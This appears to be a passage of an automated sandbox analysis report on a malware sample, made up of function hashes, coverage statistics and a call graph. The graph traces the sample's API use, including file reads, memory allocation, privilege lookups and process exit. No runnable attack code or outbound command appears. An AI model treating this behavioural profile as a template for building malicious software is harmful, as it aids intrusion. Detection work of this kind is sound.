                                            • Instruction Fuzzy Hash: CB12A4B8421745AAF330CF25E84E1A93FB7F740328B524709EA652A2E1DFB415CACF44
                                            Function 076667A8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 085d0e03a7e3987f98020c043be419d53f3a467b30fe9f702daebc61164302ff
                                            • Instruction ID: 8416a15ceafff67768983a8f7925fc3a778801d72954388a9d8cf72403949353
                                            • Opcode Fuzzy Hash: 085d0e03a7e3987f98020c043be419d53f3a467b30fe9f702daebc61164302ff
                                            • Instruction Fuzzy Hash: 6DE109B4E001198FCB14DFA8D584AAEFBB2BF89305F64C269D815AB356D731AD41CF60
                                            Function 07666370 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adf81e76ba38878e00cf7bbc0243d83808ced2aff156dca3732f42d86e0a6b7f
                                            • Instruction ID: 9680145094dff622da6cae70ebc30b085325ee4ab5bef00cdc08664cec8bc7bd
                                            • Opcode Fuzzy Hash: adf81e76ba38878e00cf7bbc0243d83808ced2aff156dca3732f42d86e0a6b7f
                                            • Instruction Fuzzy Hash: 17E118B4E001198FCB14DFA8D584AAEFBB2BF89305F64C169E415AB35AD730AD41CF61
                                            Function 07665F38 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96ca7fd544662aa0387579fa3756101026f91120dd73bd893ff3d922525e5b72
                                            • Instruction ID: d4c446d66d168fa39729bf084a02f688ad9425e46cf803b9383257c53db53ef9
                                            • Opcode Fuzzy Hash: 96ca7fd544662aa0387579fa3756101026f91120dd73bd893ff3d922525e5b72
                                            • Instruction Fuzzy Hash: F7E116B4E001198FCB14DFA8C584AAEFBB2BF89305F64C169E415AB356D731AD42CF61
                                            Function 07667E50 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb3cf10dd6b0e0b45fe2cac81f1881905712c369b5fa3ffa399685cb43ed072c
                                            • Instruction ID: 426ca6503f9aeb33e782bf78a6f6587bda7a91d543d43057d75a7f17fa6b6499
                                            • Opcode Fuzzy Hash: cb3cf10dd6b0e0b45fe2cac81f1881905712c369b5fa3ffa399685cb43ed072c
                                            • Instruction Fuzzy Hash: 50E119B4E0011A8FCB14DFA9C584AAEFBB2BF89305F64C169E415A7356D730AD41CF61
                                            Function 07665B00 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a49234fc2a176d76c6cfe42fe0bd4224ece3a4b09ebfc198e3f5ab08812156cb
                                            • Instruction ID: c8cd6a6337203045f54bc42a5798276945b9637e92af68f20aba1d1a621ec7d1
                                            • Opcode Fuzzy Hash: a49234fc2a176d76c6cfe42fe0bd4224ece3a4b09ebfc198e3f5ab08812156cb
                                            • Instruction Fuzzy Hash: A0E117B4E001198FCB14DFA8C585AAEFBB2BF89305F64C169E416AB356D730AD41CF60
                                            Function 013CDC74 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8750315cd4ba3e95ee8fb5d8703859e31706786dc55d56f227bb80f9afc7ff6
                                            • Instruction ID: 256024d196c1de8080e674dd95cbaf1ac3abc057dfcf129f347d85e579615697
                                            • Opcode Fuzzy Hash: a8750315cd4ba3e95ee8fb5d8703859e31706786dc55d56f227bb80f9afc7ff6
                                            • Instruction Fuzzy Hash: 2AA16C36E002068FCF05DFA8C8845AEBBB7BF84704B15857EE905AB265DB71ED45CB80
                                            Function 05240006 Relevance: .2, Instructions: 237COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 947df2f45b89f2321e90d217651bf2f98fa21ad270945bd767fbf3d3ccb0c58f
                                            • Instruction ID: ed7d15e4c92ba67c2d639da42a20c3397a270e643703605f11cdb4c733e5d76a
                                            • Opcode Fuzzy Hash: 947df2f45b89f2321e90d217651bf2f98fa21ad270945bd767fbf3d3ccb0c58f
                                            • Instruction Fuzzy Hash: 61C147B8421745ABF721CF25E84A1A97FB3FB81328B524709E5616B2E1DFB414CACF40
                                            Function 0766A059 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c5d405d6765e58ba52d03d7a5e728da0f3383643a3fc3c222d7f803d786ab33
                                            • Instruction ID: b2e75bb26778de0d61540c55a290bc811dd626634c0911a92d9b0e6f26a1a6ed
                                            • Opcode Fuzzy Hash: 5c5d405d6765e58ba52d03d7a5e728da0f3383643a3fc3c222d7f803d786ab33
                                            • Instruction Fuzzy Hash: 2DD012F6EAF044DEC5018AC4AC1A0F4B7BD9F8B422F8974EA8A0FB3512D114982B4654

                                            Execution Graph

                                            Execution Coverage:1.4%
                                            Dynamic/Decrypted Code Coverage:2.7%
                                            Signature Coverage:6.3%
                                            Total number of Nodes:554
                                            Total number of Limit Nodes:68
                                            execution_graph 99417 41f070 99420 41b970 99417->99420 99421 41b996 99420->99421 99428 409d40 99421->99428 99423 41b9a2 99424 41b9c3 99423->99424 99436 40c1c0 99423->99436 99426 41b9b5 99472 41a6b0 99426->99472 99475 409c90 99428->99475 99430 409d4d 99431 409d54 99430->99431 99487 409c30 99430->99487 99431->99423 99437 40c1e5 99436->99437 99903 40b1c0 99437->99903 99439 40c23c 99907 40ae40 99439->99907 99441 40c4b3 99441->99426 99442 40c262 99442->99441 99916 4143a0 99442->99916 99444 40c2a7 99444->99441 99919 408a60 99444->99919 99446 40c2eb 99446->99441 99926 41a500 99446->99926 99450 40c341 99451 40c348 99450->99451 99938 41a010 99450->99938 99452 41bdc0 2 API calls 99451->99452 99454 40c355 99452->99454 99454->99426 99456 40c392 99457 41bdc0 2 API calls 99456->99457 99458 40c399 99457->99458 99458->99426 99459 40c3a2 99460 40f4a0 3 API calls 99459->99460 99461 40c416 99460->99461 99461->99451 99462 40c421 99461->99462 99463 41bdc0 2 API calls 99462->99463 99464 40c445 99463->99464 99943 41a060 99464->99943 99467 41a010 2 API calls 99468 40c480 99467->99468 99468->99441 99948 419e20 99468->99948 99471 41a6b0 2 API calls 99471->99441 99473 41a6cf ExitProcess 99472->99473 99474 41af60 LdrLoadDll 99472->99474 99474->99473 99506 418bc0 99475->99506 99479 409cb6 99479->99430 99480 409cac 99480->99479 99513 41b2b0 99480->99513 99482 409cf3 99482->99479 99524 409ab0 99482->99524 99484 409d13 99530 409620 LdrLoadDll 99484->99530 99486 409d25 99486->99430 99488 409c4a 99487->99488 99489 41b5a0 LdrLoadDll 99487->99489 99878 41b5a0 99488->99878 99489->99488 99492 41b5a0 LdrLoadDll 99493 409c71 99492->99493 99494 40f180 99493->99494 99495 40f199 99494->99495 99886 40b040 99495->99886 99497 40f1ac 99890 41a1e0 99497->99890 99500 409d65 99500->99423 99502 40f1d2 99503 40f1fd 99502->99503 99896 41a260 99502->99896 99505 41a490 2 API calls 99503->99505 99505->99500 99507 418bcf 99506->99507 99531 414e50 99507->99531 99509 409ca3 99510 418a70 99509->99510 99537 41a600 99510->99537 99514 41b2c9 99513->99514 99544 414a50 99514->99544 99516 41b2e1 99517 41b2ea 99516->99517 99583 41b0f0 99516->99583 99517->99482 99519 41b2fe 99519->99517 99601 419f00 99519->99601 99527 409aca 99524->99527 99856 407ea0 99524->99856 99526 409ad1 99526->99484 99527->99526 99869 408160 99527->99869 99530->99486 99532 414e6a 99531->99532 99533 414e5e 99531->99533 99532->99509 99533->99532 99536 4152d0 LdrLoadDll 99533->99536 99535 414fbc 99535->99509 99536->99535 99538 418a85 99537->99538 99540 41af60 99537->99540 99538->99480 99541 41af70 99540->99541 99542 41af92 99540->99542 99543 414e50 LdrLoadDll 99541->99543 99542->99538 99543->99542 99545 414d85 99544->99545 99555 414a64 99544->99555 99545->99516 99548 414b90 99612 41a360 99548->99612 99549 414b73 99669 41a460 LdrLoadDll 99549->99669 99552 414b7d 99552->99516 99553 414bb7 99554 41bdc0 2 API calls 99553->99554 99557 414bc3 99554->99557 99555->99545 99609 419c50 99555->99609 99556 414d49 99559 41a490 2 API calls 99556->99559 99557->99552 99557->99556 99558 414d5f 99557->99558 99563 414c52 99557->99563 99681 414790 LdrLoadDll NtReadFile NtClose 99558->99681 99560 414d50 99559->99560 99560->99516 99562 414d72 99562->99516 99564 414cb9 99563->99564 99565 414c61 99563->99565 99564->99556 99566 414ccc 99564->99566 99568 414c66 99565->99568 99569 414c7a 99565->99569 99671 41a2e0 99566->99671 99670 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99568->99670 99572 414c97 99569->99572 99573 414c7f 99569->99573 99572->99560 99627 414410 99572->99627 99615 4146f0 99573->99615 99575 414c70 99575->99516 99577 414d2c 99675 41a490 99577->99675 99578 414c8d 99578->99516 99581 414caf 99581->99516 99582 414d38 99582->99516 99585 41b101 99583->99585 99584 41b113 99584->99519 99585->99584 99700 41bd40 99585->99700 99587 41b134 99703 414070 99587->99703 99589 41b180 99589->99519 99590 41b157 99590->99589 99591 414070 3 API calls 99590->99591 99592 41b179 99591->99592 99592->99589 99728 415390 99592->99728 99594 41b21a 99738 41ad70 99594->99738 99595 41b20a 99595->99594 99822 41af00 LdrLoadDll 99595->99822 99598 41b248 99817 419ec0 99598->99817 99602 419f1c 99601->99602 99603 41af60 LdrLoadDll 99601->99603 99849 1a12c0a 99602->99849 99603->99602 99604 419f37 99606 41bdc0 99604->99606 99852 41a670 99606->99852 99608 41b359 99608->99482 99610 414b44 99609->99610 99611 41af60 LdrLoadDll 99609->99611 99610->99548 99610->99549 99610->99552 99611->99610 99613 41af60 LdrLoadDll 99612->99613 99614 41a37c NtCreateFile 99613->99614 99614->99553 99616 41470c 99615->99616 99617 41a2e0 LdrLoadDll 99616->99617 99618 41472d 99617->99618 99619 414734 99618->99619 99620 414748 99618->99620 99622 41a490 2 API calls 99619->99622 99621 41a490 2 API calls 99620->99621 99623 414751 99621->99623 99624 41473d 99622->99624 99682 41bfd0 LdrLoadDll RtlAllocateHeap 99623->99682 99624->99578 99626 41475c 99626->99578 99628 41445b 99627->99628 99629 41448e 99627->99629 99631 41a2e0 LdrLoadDll 99628->99631 99630 4145d9 99629->99630 99634 4144aa 99629->99634 99632 41a2e0 LdrLoadDll 99630->99632 99633 414476 99631->99633 99639 4145f4 99632->99639 99635 41a490 2 API calls 99633->99635 99636 41a2e0 LdrLoadDll 99634->99636 99637 41447f 99635->99637 99638 4144c5 99636->99638 99637->99581 99641 4144e1 99638->99641 99642 4144cc 99638->99642 99696 41a320 LdrLoadDll 99639->99696 99645 4144e6 99641->99645 99646 4144fc 99641->99646 99644 41a490 2 API calls 99642->99644 99643 41462e 99647 41a490 2 API calls 99643->99647 99648 4144d5 99644->99648 99649 41a490 2 API calls 99645->99649 99654 414501 99646->99654 99683 41bf90 99646->99683 99650 414639 99647->99650 99648->99581 99651 4144ef 99649->99651 99650->99581 99651->99581 99656 414513 99654->99656 99687 41a410 99654->99687 99655 414567 99657 41457e 99655->99657 99695 41a2a0 LdrLoadDll 99655->99695 99656->99581 99659 414585 99657->99659 99660 41459a 99657->99660 99662 41a490 2 API calls 99659->99662 99661 41a490 2 API calls 99660->99661 99663 4145a3 99661->99663 99662->99656 99664 4145cf 99663->99664 99690 41bb90 99663->99690 99664->99581 99666 4145ba 99667 41bdc0 2 API calls 99666->99667 99668 4145c3 99667->99668 99668->99581 99669->99552 99670->99575 99672 414d14 99671->99672 99673 41af60 LdrLoadDll 99671->99673 99674 41a320 LdrLoadDll 99672->99674 99673->99672 99674->99577 99676 41a4ac NtClose 99675->99676 99677 41af60 LdrLoadDll 99675->99677 99676->99582 99678 41a4d6 99676->99678 99677->99676 99679 41af60 LdrLoadDll 99678->99679 99680 41a4dc 99679->99680 99680->99582 99681->99562 99682->99626 99684 41bfa3 99683->99684 99697 41a630 99684->99697 99686 41bfa8 99686->99654 99688 41a42c NtReadFile 99687->99688 99689 41af60 LdrLoadDll 99687->99689 99688->99655 99689->99688 99691 41bbb4 99690->99691 99692 41bb9d 99690->99692 99691->99666 99692->99691 99693 41bf90 2 API calls 99692->99693 99694 41bbcb 99693->99694 99694->99666 99695->99657 99696->99643 99698 41af60 LdrLoadDll 99697->99698 99699 41a64c RtlAllocateHeap 99698->99699 99699->99686 99823 41a540 99700->99823 99702 41bd6d 99702->99587 99704 414081 99703->99704 99705 414089 99703->99705 99704->99590 99727 41435c 99705->99727 99826 41cf30 99705->99826 99707 4140dd 99708 41cf30 2 API calls 99707->99708 99711 4140e8 99708->99711 99709 414136 99712 41cf30 2 API calls 99709->99712 99711->99709 99831 41cfd0 99711->99831 99713 41414a 99712->99713 99714 41cf30 2 API calls 99713->99714 99716 4141bd 99714->99716 99715 41cf30 2 API calls 99724 414205 99715->99724 99716->99715 99718 414334 99838 41cf90 LdrLoadDll RtlFreeHeap 99718->99838 99720 41433e 99839 41cf90 LdrLoadDll RtlFreeHeap 99720->99839 99722 414348 99840 41cf90 LdrLoadDll RtlFreeHeap 99722->99840 99837 41cf90 LdrLoadDll RtlFreeHeap 99724->99837 99725 414352 99841 41cf90 LdrLoadDll RtlFreeHeap 99725->99841 99727->99590 99729 4153a1 99728->99729 99730 414a50 8 API calls 99729->99730 99732 4153b7 99730->99732 99731 41540a 99731->99595 99732->99731 99733 4153f2 99732->99733 99734 415405 99732->99734 99735 41bdc0 2 API calls 99733->99735 99736 41bdc0 2 API calls 99734->99736 99737 4153f7 99735->99737 99736->99731 99737->99595 99842 41ac30 99738->99842 99740 41ad84 99741 41ac30 LdrLoadDll 99740->99741 99742 41ad8d 99741->99742 99743 41ac30 LdrLoadDll 99742->99743 99744 41ad96 99743->99744 99745 41ac30 LdrLoadDll 99744->99745 99746 41ad9f 99745->99746 99747 41ac30 LdrLoadDll 99746->99747 99748 41ada8 99747->99748 99749 41ac30 LdrLoadDll 99748->99749 99750 41adb1 99749->99750 99751 41ac30 LdrLoadDll 99750->99751 99752 41adbd 99751->99752 99753 41ac30 LdrLoadDll 99752->99753 99754 41adc6 99753->99754 99755 41ac30 LdrLoadDll 99754->99755 99756 41adcf 99755->99756 99757 41ac30 LdrLoadDll 99756->99757 99758 41add8 99757->99758 99759 41ac30 LdrLoadDll 99758->99759 99760 41ade1 99759->99760 99761 41ac30 LdrLoadDll 99760->99761 99762 41adea 99761->99762 99763 41ac30 LdrLoadDll 99762->99763 99764 41adf6 99763->99764 99765 41ac30 LdrLoadDll 99764->99765 99766 41adff 99765->99766 99767 41ac30 LdrLoadDll 99766->99767 99768 41ae08 99767->99768 99769 41ac30 LdrLoadDll 99768->99769 99770 41ae11 99769->99770 99771 41ac30 LdrLoadDll 99770->99771 99772 41ae1a 99771->99772 99773 41ac30 LdrLoadDll 99772->99773 99774 41ae23 99773->99774 99775 41ac30 LdrLoadDll 99774->99775 99776 41ae2f 99775->99776 99777 41ac30 LdrLoadDll 99776->99777 99778 41ae38 99777->99778 99779 41ac30 LdrLoadDll 99778->99779 99780 41ae41 99779->99780 99781 41ac30 LdrLoadDll 99780->99781 99782 41ae4a 99781->99782 99783 41ac30 LdrLoadDll 99782->99783 99784 41ae53 99783->99784 99785 41ac30 LdrLoadDll 99784->99785 99786 41ae5c 99785->99786 99787 41ac30 LdrLoadDll 99786->99787 99788 41ae68 99787->99788 99789 41ac30 LdrLoadDll 99788->99789 99790 41ae71 99789->99790 99791 41ac30 LdrLoadDll 99790->99791 99792 41ae7a 99791->99792 99793 41ac30 LdrLoadDll 99792->99793 99794 41ae83 99793->99794 99795 41ac30 LdrLoadDll 99794->99795 99796 41ae8c 99795->99796 99797 41ac30 LdrLoadDll 99796->99797 99798 41ae95 99797->99798 99799 41ac30 LdrLoadDll 99798->99799 99800 41aea1 99799->99800 99801 41ac30 LdrLoadDll 99800->99801 99802 41aeaa 99801->99802 99803 41ac30 LdrLoadDll 99802->99803 99804 41aeb3 99803->99804 99805 41ac30 LdrLoadDll 99804->99805 99806 41aebc 99805->99806 99807 41ac30 LdrLoadDll 99806->99807 99808 41aec5 99807->99808 99809 41ac30 LdrLoadDll 99808->99809 99810 41aece 99809->99810 99811 41ac30 LdrLoadDll 99810->99811 99812 41aeda 99811->99812 99813 41ac30 LdrLoadDll 99812->99813 99814 41aee3 99813->99814 99815 41ac30 LdrLoadDll 99814->99815 99816 41aeec 99815->99816 99816->99598 99818 41af60 LdrLoadDll 99817->99818 99819 419edc 99818->99819 99848 1a12df0 LdrInitializeThunk 99819->99848 99820 419ef3 99820->99519 99822->99594 99824 41af60 LdrLoadDll 99823->99824 99825 41a55c NtAllocateVirtualMemory 99824->99825 99825->99702 99827 41cf40 99826->99827 99828 41cf46 99826->99828 99827->99707 99829 41bf90 2 API calls 99828->99829 99830 41cf6c 99829->99830 99830->99707 99832 41cff5 99831->99832 99835 41d02d 99831->99835 99833 41bf90 2 API calls 99832->99833 99834 41d00a 99833->99834 99836 41bdc0 2 API calls 99834->99836 99835->99711 99836->99835 99837->99718 99838->99720 99839->99722 99840->99725 99841->99727 99843 41ac4b 99842->99843 99844 414e50 LdrLoadDll 99843->99844 99845 41ac6b 99844->99845 99846 414e50 LdrLoadDll 99845->99846 99847 41ad17 99845->99847 99846->99847 99847->99740 99847->99847 99848->99820 99850 1a12c11 99849->99850 99851 1a12c1f LdrInitializeThunk 99849->99851 99850->99604 99851->99604 99853 41af60 LdrLoadDll 99852->99853 99854 41a68c RtlFreeHeap 99853->99854 99854->99608 99857 407eb0 99856->99857 99858 407eab 99856->99858 99859 41bd40 2 API calls 99857->99859 99858->99527 99862 407ed5 99859->99862 99860 407f38 99860->99527 99861 419ec0 2 API calls 99861->99862 99862->99860 99862->99861 99863 407f3e 99862->99863 99868 41bd40 2 API calls 99862->99868 99872 41a5c0 99862->99872 99864 407f64 99863->99864 99866 41a5c0 2 API calls 99863->99866 99864->99527 99867 407f55 99866->99867 99867->99527 99868->99862 99870 40817e 99869->99870 99871 41a5c0 2 API calls 99869->99871 99870->99484 99871->99870 99873 41af60 LdrLoadDll 99872->99873 99874 41a5dc 99873->99874 99877 1a12c70 LdrInitializeThunk 99874->99877 99875 41a5f3 99875->99862 99877->99875 99879 41b5c3 99878->99879 99882 40acf0 99879->99882 99883 40ad14 99882->99883 99884 40ad50 LdrLoadDll 99883->99884 99885 409c5b 99883->99885 99884->99885 99885->99492 99887 40b063 99886->99887 99889 40b0e0 99887->99889 99901 419c90 LdrLoadDll 99887->99901 99889->99497 99891 41af60 LdrLoadDll 99890->99891 99892 40f1bb 99891->99892 99892->99500 99893 41a7d0 99892->99893 99894 41a7ef LookupPrivilegeValueW 99893->99894 99895 41af60 LdrLoadDll 99893->99895 99894->99502 99895->99894 99897 41a27c 99896->99897 99898 41af60 LdrLoadDll 99896->99898 99902 1a12ea0 LdrInitializeThunk 99897->99902 99898->99897 99899 41a29b 99899->99503 99901->99889 99902->99899 99904 40b1f0 99903->99904 99905 40b040 LdrLoadDll 99904->99905 99906 40b204 99905->99906 99906->99439 99908 40ae51 99907->99908 99909 40ae4d 99907->99909 99910 40ae6a 99908->99910 99911 40ae9c 99908->99911 99909->99442 99953 419cd0 LdrLoadDll 99910->99953 99954 419cd0 LdrLoadDll 99911->99954 99913 40aead 99913->99442 99915 40ae8c 99915->99442 99917 40f4a0 3 API calls 99916->99917 99918 4143c6 99917->99918 99918->99444 99920 408a79 99919->99920 99955 4087a0 99919->99955 99922 408a9d 99920->99922 99923 4087a0 19 API calls 99920->99923 99922->99446 99924 408a8a 99923->99924 99924->99922 99973 40f710 10 API calls 99924->99973 99927 41af60 LdrLoadDll 99926->99927 99928 41a51c 99927->99928 100092 1a12e80 LdrInitializeThunk 99928->100092 99929 40c322 99931 40f4a0 99929->99931 99932 40f4bd 99931->99932 100093 419fc0 99932->100093 99934 40f505 99934->99450 99936 41a010 2 API calls 99937 40f52e 99936->99937 99937->99450 99939 41a02c 99938->99939 99940 41af60 LdrLoadDll 99938->99940 100099 1a12d10 LdrInitializeThunk 99939->100099 99940->99939 99941 40c385 99941->99456 99941->99459 99944 41af60 LdrLoadDll 99943->99944 99945 41a07c 99944->99945 100100 1a12d30 LdrInitializeThunk 99945->100100 99946 40c459 99946->99467 99949 41af60 LdrLoadDll 99948->99949 99950 419e3c 99949->99950 100101 1a12fb0 LdrInitializeThunk 99950->100101 99951 40c4ac 99951->99471 99953->99915 99954->99913 99956 407ea0 4 API calls 99955->99956 99960 4087ba 99955->99960 99956->99960 99957 408a49 99957->99920 99958 408a3f 99961 408160 2 API calls 99958->99961 99960->99957 99960->99958 99963 419f00 2 API calls 99960->99963 99967 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99960->99967 99970 419e20 2 API calls 99960->99970 99971 41a490 LdrLoadDll NtClose 99960->99971 99974 419d10 99960->99974 99977 4085d0 99960->99977 99989 40f5f0 LdrLoadDll NtClose 99960->99989 99990 419d90 LdrLoadDll 99960->99990 99991 419dc0 LdrLoadDll 99960->99991 99992 419e50 LdrLoadDll 99960->99992 99993 4083a0 99960->99993 100009 405f60 LdrLoadDll 99960->100009 99961->99957 99963->99960 99967->99960 99970->99960 99971->99960 99973->99922 99975 41af60 LdrLoadDll 99974->99975 99976 419d2c 99975->99976 99976->99960 99978 4085e6 99977->99978 100010 419880 99978->100010 99980 408771 99980->99960 99981 4085ff 99981->99980 100031 4081a0 99981->100031 99983 4086e5 99983->99980 99984 4083a0 11 API calls 99983->99984 99985 408713 99984->99985 99985->99980 99986 419f00 2 API calls 99985->99986 99987 408748 99986->99987 99987->99980 99988 41a500 2 API calls 99987->99988 99988->99980 99989->99960 99990->99960 99991->99960 99992->99960 99994 4083c9 99993->99994 100071 408310 99994->100071 99997 4083dc 99998 41a500 2 API calls 99997->99998 99999 408467 99997->99999 100001 408462 99997->100001 100079 40f670 99997->100079 99998->99997 99999->99960 100000 41a490 2 API calls 100002 40849a 100000->100002 100001->100000 100002->99999 100003 419d10 LdrLoadDll 100002->100003 100004 4084ff 100003->100004 100004->99999 100083 419d50 100004->100083 100006 408563 100006->99999 100007 414a50 8 API calls 100006->100007 100008 4085b8 100007->100008 100008->99960 100009->99960 100011 41bf90 2 API calls 100010->100011 100012 419897 100011->100012 100038 409310 100012->100038 100014 4198b2 100015 4198f0 100014->100015 100016 4198d9 100014->100016 100019 41bd40 2 API calls 100015->100019 100017 41bdc0 2 API calls 100016->100017 100018 4198e6 100017->100018 100018->99981 100020 41992a 100019->100020 100021 41bd40 2 API calls 100020->100021 100022 419943 100021->100022 100026 419be4 100022->100026 100044 41bd80 100022->100044 100025 419bd0 100027 41bdc0 2 API calls 100025->100027 100029 41bdc0 2 API calls 100026->100029 100028 419bda 100027->100028 100028->99981 100030 419c39 100029->100030 100030->99981 100032 40829f 100031->100032 100033 4081b5 100031->100033 100032->99983 100033->100032 100034 414a50 8 API calls 100033->100034 100035 408222 100034->100035 100036 41bdc0 2 API calls 100035->100036 100037 408249 100035->100037 100036->100037 100037->99983 100039 409335 100038->100039 100040 40acf0 LdrLoadDll 100039->100040 100041 409368 100040->100041 100043 40938d 100041->100043 100047 40cf20 100041->100047 100043->100014 100045 419bc9 100044->100045 100065 41a580 100044->100065 100045->100025 100045->100026 100048 40cf4c 100047->100048 100049 41a1e0 LdrLoadDll 100048->100049 100050 40cf65 100049->100050 100051 40cf6c 100050->100051 100058 41a220 100050->100058 100051->100043 100055 40cfa7 100056 41a490 2 API calls 100055->100056 100057 40cfca 100056->100057 100057->100043 100059 41af60 LdrLoadDll 100058->100059 100060 41a23c 100059->100060 100064 1a12ca0 LdrInitializeThunk 100060->100064 100061 40cf8f 100061->100051 100063 41a810 LdrLoadDll 100061->100063 100063->100055 100064->100061 100066 41af60 LdrLoadDll 100065->100066 100067 41a59c 100066->100067 100070 1a12f90 LdrInitializeThunk 100067->100070 100068 41a5b7 100068->100045 100070->100068 100072 408328 100071->100072 100073 40acf0 LdrLoadDll 100072->100073 100074 408343 100073->100074 100075 414e50 LdrLoadDll 100074->100075 100076 408353 100075->100076 100077 40835c PostThreadMessageW 100076->100077 100078 408370 100076->100078 100077->100078 100078->99997 100080 40f683 100079->100080 100086 419e90 100080->100086 100084 41af60 LdrLoadDll 100083->100084 100085 419d6c 100084->100085 100085->100006 100087 41af60 LdrLoadDll 100086->100087 100088 419eac 100087->100088 100091 1a12dd0 LdrInitializeThunk 100088->100091 100089 40f6ae 100089->99997 100091->100089 100092->99929 100094 41af60 LdrLoadDll 100093->100094 100095 419fdc 100094->100095 100098 1a12f30 LdrInitializeThunk 100095->100098 100096 40f4fe 100096->99934 100096->99936 100098->100096 100099->99941 100100->99946 100101->99951 100104 1a12ad0 LdrInitializeThunk

                                            Executed Functions

                                            Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                            Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 41a40a-41a459 call 41af60 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
